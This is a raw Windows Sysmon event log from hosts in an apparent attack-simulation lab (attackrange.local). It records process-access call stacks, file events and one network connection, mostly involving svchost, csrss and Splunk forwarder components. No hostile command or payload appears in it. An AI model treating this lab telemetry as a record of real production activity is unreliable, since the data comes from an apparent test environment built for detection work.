STEM32\ntdll.dll+51781 10341000x8000000000000000808114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.598{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.581{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A30BDD3C4B53BFEE1EDBE5B9B47132F,SHA256=A17C8DCAC1336CE0E9A8BE1DC0C11AE7A2115DBDAE8D24BC15ACBBD6A31D271D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.670{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51072-false10.0.1.12-8000- 23542300x80000000000000001050114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.212{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=D339C0062800642C9CB48F73648C8187,SHA256=1848059B4B71FFFE42A7CD2C312747759BBC288C15DD191828C85CD16D17CBAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808102Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0160BBF0C0202DEB23F9EFD697035D6C,SHA256=C3C6EA69D5D7301EDBB9D2AD1EA735D13574FAEA27CF00B272CAD37A0B3727CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808101Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.331{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9217A22E84A9FC901D826348FED3EA98,SHA256=6B572022D0EAD435E0C1CBAB5E938E7F23380B1FC12BAC3DDBEDF32C4702049C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808100Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:26.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF6BCB60871607BA305E8A0550C525E,SHA256=C2FB648D4A19D2871BC04AAE09676E8061CD1F9FF9BF960794DEDD0517DB3365,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808144Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808143Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808142Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808141Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808140Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808139Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808138Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808137Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808136Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:26.971{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808135Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808134Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:26.971{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56E-60EB-8C79-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
